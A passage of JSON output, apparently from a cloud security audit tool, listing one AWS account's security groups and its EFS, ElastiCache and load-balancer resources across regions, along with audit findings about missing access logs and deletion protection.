{"description": "default VPC security group","id": "sg-9be71df6","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-9be71df6","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"ap-south-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "ap-south-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-2651a14d": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-3e983346": {"description": "default VPC security group","id": "sg-3e983346","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-3e983346","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"ap-southeast-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "ap-southeast-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-04ed1062": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-71eb4839": {"description": "default VPC security group","id": "sg-71eb4839","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-71eb4839","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"ap-southeast-2": {"instances_count": 0,"network_interfaces_count": 0,"region": "ap-southeast-2","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-5d22c33b": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-8a48ccc0": {"description": "default VPC security group","id": "sg-8a48ccc0","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-8a48ccc0","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"ca-central-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "ca-central-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-b5113ddd": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-62215504": {"description": "default VPC security group","id": "sg-62215504","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-62215504","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"eu-central-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "eu-central-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-78b43312": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-c1194bbf": {"description": "default VPC security group","id": "sg-c1194bbf","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-c1194bbf","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"eu-north-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "eu-north-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-fa259d93": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-09c1e96a": {"description": "default VPC security group","id": "sg-09c1e96a","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-09c1e96a","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"eu-south-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "eu-south-1","security_groups_count": 0,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {}},"eu-west-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "eu-west-1","security_groups_count": 3,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-f24c7994": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-02063087593480392": {"description": "Slave group for Elastic MapReduce created on 2019-01-26T08:00:38.387Z","id": "sg-02063087593480392","name": "ElasticMapReduce-slave","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 6,"protocols": {"ICMP": {"ports": {"ALL": {"security_groups": [{"GroupId": "sg-02063087593480392","GroupName": "ElasticMapReduce-slave","UserId": "430150006394"},{"GroupId": "sg-0c59ae38c42100171","GroupName": "ElasticMapReduce-master","UserId": "430150006394"}]}}},"TCP": {"ports": {"0-65535": {"security_groups": [{"GroupId": "sg-02063087593480392","GroupName": "ElasticMapReduce-slave","UserId": "430150006394"},{"GroupId": "sg-0c59ae38c42100171","GroupName": "ElasticMapReduce-master","UserId": "430150006394"}]}}},"UDP": {"ports": {"0-65535": {"security_groups": [{"GroupId": "sg-02063087593480392","GroupName": "ElasticMapReduce-slave","UserId": "430150006394"},{"GroupId": "sg-0c59ae38c42100171","GroupName": "ElasticMapReduce-master","UserId": "430150006394"}]}}}}}}},"sg-0c59ae38c42100171": {"description": "Master group for Elastic MapReduce created on 2019-01-26T08:00:38.387Z","id": "sg-0c59ae38c42100171","name": "ElasticMapReduce-master","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 11,"protocols": {"ICMP": {"ports": {"ALL": {"security_groups": [{"GroupId": "sg-02063087593480392","GroupName": "ElasticMapReduce-slave","UserId": "430150006394"},{"GroupId": "sg-0c59ae38c42100171","GroupName": "ElasticMapReduce-master","UserId": "430150006394"}]}}},"TCP": {"ports": {"0-65535": {"cidrs": [{"CIDR": "88.171.207.128/30"}],"security_groups": [{"GroupId": "sg-02063087593480392","GroupName": "ElasticMapReduce-slave","UserId": "430150006394"},{"GroupId": "sg-0c59ae38c42100171","GroupName": "ElasticMapReduce-master","UserId": "430150006394"}]},"8443": {"cidrs": [{"CIDR": "87.238.84.64/29"},{"CIDR": "54.239.99.0/24"},{"CIDR": "87.238.80.64/29"},{"CIDR": "54.240.197.0/24"}]}}},"UDP": {"ports": {"0-65535": {"security_groups": [{"GroupId": "sg-02063087593480392","GroupName": "ElasticMapReduce-slave","UserId": "430150006394"},{"GroupId": "sg-0c59ae38c42100171","GroupName": "ElasticMapReduce-master","UserId": "430150006394"}]}}}}}}},"sg-186a6a69": {"description": "default VPC security group","id": "sg-186a6a69","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-186a6a69","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"eu-west-2": {"instances_count": 0,"network_interfaces_count": 0,"region": "eu-west-2","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-3fa2fa57": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-223b755a": {"description": "default VPC security group","id": "sg-223b755a","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-223b755a","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"eu-west-3": {"instances_count": 0,"network_interfaces_count": 0,"region": "eu-west-3","security_groups_count": 2,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-87d3fdee": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-000c4c21c24f75b85": {"description": "launch-wizard-1 created 2019-12-23T12:17:14.882+01:00","id": "sg-000c4c21c24f75b85","name": "launch-wizard-1","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"TCP": {"ports": {"22": {"cidrs": [{"CIDR": "86.250.138.62/32"}]}}}}}}},"sg-4cc9d827": {"description": "default VPC security group","id": "sg-4cc9d827","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-4cc9d827","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"me-south-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "me-south-1","security_groups_count": 0,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {}},"sa-east-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "sa-east-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-b14fa4d7": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-3965844c": {"description": "default VPC security group","id": "sg-3965844c","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-3965844c","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"us-east-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "us-east-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-ba1cbdc7": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-4574a94e": {"description": "default VPC security group","id": "sg-4574a94e","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-4574a94e","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"us-east-2": {"instances_count": 0,"network_interfaces_count": 0,"region": "us-east-2","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-e429ad8f": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-a81474db": {"description": "default VPC security group","id": "sg-a81474db","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-a81474db","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"us-west-1": {"instances_count": 0,"network_interfaces_count": 0,"region": "us-west-1","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-6e6fa508": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-778f4e3e": {"description": "default VPC security group","id": "sg-778f4e3e","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-778f4e3e","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}},"us-west-2": {"instances_count": 0,"network_interfaces_count": 0,"region": "us-west-2","security_groups_count": 1,"snapshots": {},"snapshots_count": 0,"volumes": {},"volumes_count": 0,"vpc_resource_types": ["instances","security_groups","network_interfaces"],"vpcs": {"vpc-d45709ac": {"instances": {},"name": null,"network_interfaces": {},"security_groups": {"sg-a9b5628e": {"description": "default VPC security group","id": "sg-a9b5628e","name": "default","owner_id": "430150006394","rules": {"egress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}},"ingress": {"count": 1,"protocols": {"ALL": {"ports": {"N/A": {"security_groups": [{"GroupId": "sg-a9b5628e","GroupName": "default","UserId": "430150006394"}]}}}}}}}}}}}},"regions_count": 21,"resource_types": {"global": [],"region": ["volumes","snapshots"],"vpc": ["instances","security_groups","network_interfaces"]},"security_groups_count": 20,"service": "ec2","snapshots_count": 0,"targets": {"first_region": [["instances","Reservations","describe_instances",{},false],["security_groups","SecurityGroups","describe_security_groups",{},false],["volumes","Volumes","describe_volumes",{},false],["snapshots","Snapshots","describe_snapshots",{"OwnerIds": ["430150006394"]},false],["network_interfaces","NetworkInterfaces","describe_network_interfaces",{},false]],"other_regions": [["instances","Reservations","describe_instances",{},false],["security_groups","SecurityGroups","describe_security_groups",{},false],["volumes","Volumes","describe_volumes",{},false],["snapshots","Snapshots","describe_snapshots",{"OwnerIds": ["430150006394"]},false],["network_interfaces","NetworkInterfaces","describe_network_interfaces",{},false]]},"thread_config": {"list": 10,"parse": 20},"volumes_count": 0},"efs": {"file_systems_count": 0,"filters": {},"findings": {},"regions": {"af-south-1": {"file_systems": {},"file_systems_count": 0,"region": "af-south-1"},"ap-east-1": {"file_systems": {},"file_systems_count": 0,"region": "ap-east-1"},"ap-northeast-1": {"file_systems": {},"file_systems_count": 0,"region": "ap-northeast-1"},"ap-northeast-2": {"file_systems": {},"file_systems_count": 0,"region": "ap-northeast-2"},"ap-northeast-3": {"file_systems": {},"file_systems_count": 0,"region": "ap-northeast-3"},"ap-south-1": {"file_systems": {},"file_systems_count": 0,"region": "ap-south-1"},"ap-southeast-1": {"file_systems": {},"file_systems_count": 0,"region": "ap-southeast-1"},"ap-southeast-2": {"file_systems": {},"file_systems_count": 0,"region": "ap-southeast-2"},"ca-central-1": {"file_systems": {},"file_systems_count": 0,"region": "ca-central-1"},"eu-central-1": {"file_systems": {},"file_systems_count": 0,"region": "eu-central-1"},"eu-north-1": {"file_systems": {},"file_systems_count": 0,"region": "eu-north-1"},"eu-south-1": {"file_systems": {},"file_systems_count": 0,"region": "eu-south-1"},"eu-west-1": {"file_systems": {},"file_systems_count": 0,"region": "eu-west-1"},"eu-west-2": {"file_systems": {},"file_systems_count": 0,"region": "eu-west-2"},"eu-west-3": {"file_systems": {},"file_systems_count": 0,"region": "eu-west-3"},"me-south-1": {"file_systems": {},"file_systems_count": 0,"region": "me-south-1"},"sa-east-1": {"file_systems": {},"file_systems_count": 0,"region": "sa-east-1"},"us-east-1": {"file_systems": {},"file_systems_count": 0,"region": "us-east-1"},"us-east-2": {"file_systems": {},"file_systems_count": 0,"region": "us-east-2"},"us-west-1": {"file_systems": {},"file_systems_count": 0,"region": "us-west-1"},"us-west-2": {"file_systems": {},"file_systems_count": 0,"region": "us-west-2"}},"regions_count": 21,"resource_types": {"global": [],"region": ["file_systems"],"vpc": []},"service": "efs","targets": {"first_region": [["file_systems","FileSystems","describe_file_systems",{},false]],"other_regions": [["file_systems","FileSystems","describe_file_systems",{},false]]},"thread_config": {"list": 10,"parse": 20}},"elasticache": {"clusters_count": 0,"filters": {},"findings": {},"regions": {"af-south-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "af-south-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"ap-east-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-east-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"ap-northeast-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"ap-northeast-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"ap-northeast-3": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-3","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"ap-south-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-south-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"ap-southeast-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-southeast-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"ap-southeast-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-southeast-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"ca-central-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ca-central-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"eu-central-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-central-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"eu-north-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-north-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"eu-south-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-south-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"eu-west-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"eu-west-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"eu-west-3": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-3","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"me-south-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "me-south-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"sa-east-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "sa-east-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"us-east-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-east-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"us-east-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-east-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"us-west-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-west-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}},"us-west-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-west-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters","subnet_groups"],"vpcs": {}}},"regions_count": 21,"resource_types": {"global": [],"region": ["parameter_groups","security_groups"],"vpc": ["clusters","subnet_groups"]},"security_groups_count": 0,"service": "elasticache","targets": {"first_region": [["clusters","CacheClusters","describe_cache_clusters",{},false],["security_groups","CacheSecurityGroups","describe_cache_security_groups",{},true]],"other_regions": [["clusters","CacheClusters","describe_cache_clusters",{},false],["security_groups","CacheSecurityGroups","describe_cache_security_groups",{},true]]},"thread_config": {"list": 10,"parse": 20}},"elb": {"elbs_count": 0,"filters": {},"findings": {"elb-no-access-logs": {"checked_items": 0,"dashboard_name": "Load Balancer Attributes","description": "Lack of access logs","display_path": "elb.regions.id.vpcs.id.elbs.id","flagged_items": 0,"items": [],"level": "warning","path": "elb.regions.id.vpcs.id.elbs.id.attributes.AccessLog.Enabled","rationale": "Access logs enable traffic analysis and identification of security issues.","service": "ELB"}},"regions": {"af-south-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "af-south-1","vpc_resource_types": ["elbs"],"vpcs": {}},"ap-east-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "ap-east-1","vpc_resource_types": ["elbs"],"vpcs": {}},"ap-northeast-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "ap-northeast-1","vpc_resource_types": ["elbs"],"vpcs": {}},"ap-northeast-2": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "ap-northeast-2","vpc_resource_types": ["elbs"],"vpcs": {}},"ap-northeast-3": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "ap-northeast-3","vpc_resource_types": ["elbs"],"vpcs": {}},"ap-south-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "ap-south-1","vpc_resource_types": ["elbs"],"vpcs": {}},"ap-southeast-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "ap-southeast-1","vpc_resource_types": ["elbs"],"vpcs": {}},"ap-southeast-2": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "ap-southeast-2","vpc_resource_types": ["elbs"],"vpcs": {}},"ca-central-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "ca-central-1","vpc_resource_types": ["elbs"],"vpcs": {}},"eu-central-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "eu-central-1","vpc_resource_types": ["elbs"],"vpcs": {}},"eu-north-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "eu-north-1","vpc_resource_types": ["elbs"],"vpcs": {}},"eu-south-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "eu-south-1","vpc_resource_types": ["elbs"],"vpcs": {}},"eu-west-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "eu-west-1","vpc_resource_types": ["elbs"],"vpcs": {}},"eu-west-2": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "eu-west-2","vpc_resource_types": ["elbs"],"vpcs": {}},"eu-west-3": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "eu-west-3","vpc_resource_types": ["elbs"],"vpcs": {}},"me-south-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "me-south-1","vpc_resource_types": ["elbs"],"vpcs": {}},"sa-east-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "sa-east-1","vpc_resource_types": ["elbs"],"vpcs": {}},"us-east-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "us-east-1","vpc_resource_types": ["elbs"],"vpcs": {}},"us-east-2": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "us-east-2","vpc_resource_types": ["elbs"],"vpcs": {}},"us-west-1": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "us-west-1","vpc_resource_types": ["elbs"],"vpcs": {}},"us-west-2": {"elb_policies": {},"elb_policies_count": 0,"elbs_count": 0,"region": "us-west-2","vpc_resource_types": ["elbs"],"vpcs": {}}},"regions_count": 21,"resource_types": {"global": [],"region": ["elb_policies"],"vpc": ["elbs"]},"service": "elb","targets": {"first_region": [["elbs","LoadBalancerDescriptions","describe_load_balancers",{},false]],"other_regions": [["elbs","LoadBalancerDescriptions","describe_load_balancers",{},false]]},"thread_config": {"list": 10,"parse": 20}},"elbv2": {"filters": {},"findings": {"elbv2-no-access-logs": {"checked_items": 0,"dashboard_name": "Load Balancer Attributes","description": "Lack of access logs","display_path": "elbv2.regions.id.vpcs.id.lbs.id","flagged_items": 0,"items": [],"level": "warning","path": "elbv2.regions.id.vpcs.id.lbs.id.attributes.id","rationale": "Access logs enable traffic analysis and identification of security issues.","service": "ELBV2"},"elbv2-no-deletion-protection": {"checked_items": 0,"dashboard_name": "Load Balancer Attributes","description": "Lack of deletion protection","display_path": "elbv2.regions.id.vpcs.id.lbs.id","flagged_items": 0,"items": [],"level": "warning","path": "elbv2.regions.id.vpcs.id.lbs.id.attributes.id","rationale": "Enabling deletion protection on load balancers mitigates risks of accidental deletion.","service": "ELBV2"},"elbv2-older-ssl-policy": {"checked_items": 0,"dashboard_name": "Load Balancer Listeners","description": "Older SSL/TLS policy","display_path": "elbv2.regions.id.vpcs.id.lbs.id","flagged_items": 0,"items": [],"level": "warning","path": "elbv2.regions.id.vpcs.id.lbs.id.listeners.id.SslPolicy","rationale": "Use of AWS latest TLS policy is best practice.","service": "ELBV2"}},"lbs_count": 0,"regions": {"af-south-1": {"lbs_count": 0,"region": "af-south-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"ap-east-1": {"lbs_count": 0,"region": "ap-east-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"ap-northeast-1": {"lbs_count": 0,"region": "ap-northeast-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"ap-northeast-2": {"lbs_count": 0,"region": "ap-northeast-2","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"ap-northeast-3": {"lbs_count": 0,"region": "ap-northeast-3","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"ap-south-1": {"lbs_count": 0,"region": "ap-south-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"ap-southeast-1": {"lbs_count": 0,"region": "ap-southeast-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"ap-southeast-2": {"lbs_count": 0,"region": "ap-southeast-2","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"ca-central-1": {"lbs_count": 0,"region": "ca-central-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"eu-central-1": {"lbs_count": 0,"region": "eu-central-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"eu-north-1": {"lbs_count": 0,"region": "eu-north-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"eu-south-1": {"lbs_count": 0,"region": "eu-south-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"eu-west-1": {"lbs_count": 0,"region": "eu-west-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"eu-west-2": {"lbs_count": 0,"region": "eu-west-2","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"eu-west-3": {"lbs_count": 0,"region": "eu-west-3","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"me-south-1": {"lbs_count": 0,"region": "me-south-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"sa-east-1": {"lbs_count": 0,"region": "sa-east-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"us-east-1": {"lbs_count": 0,"region": "us-east-1","ssl_policies": {},"ssl_policies_count": 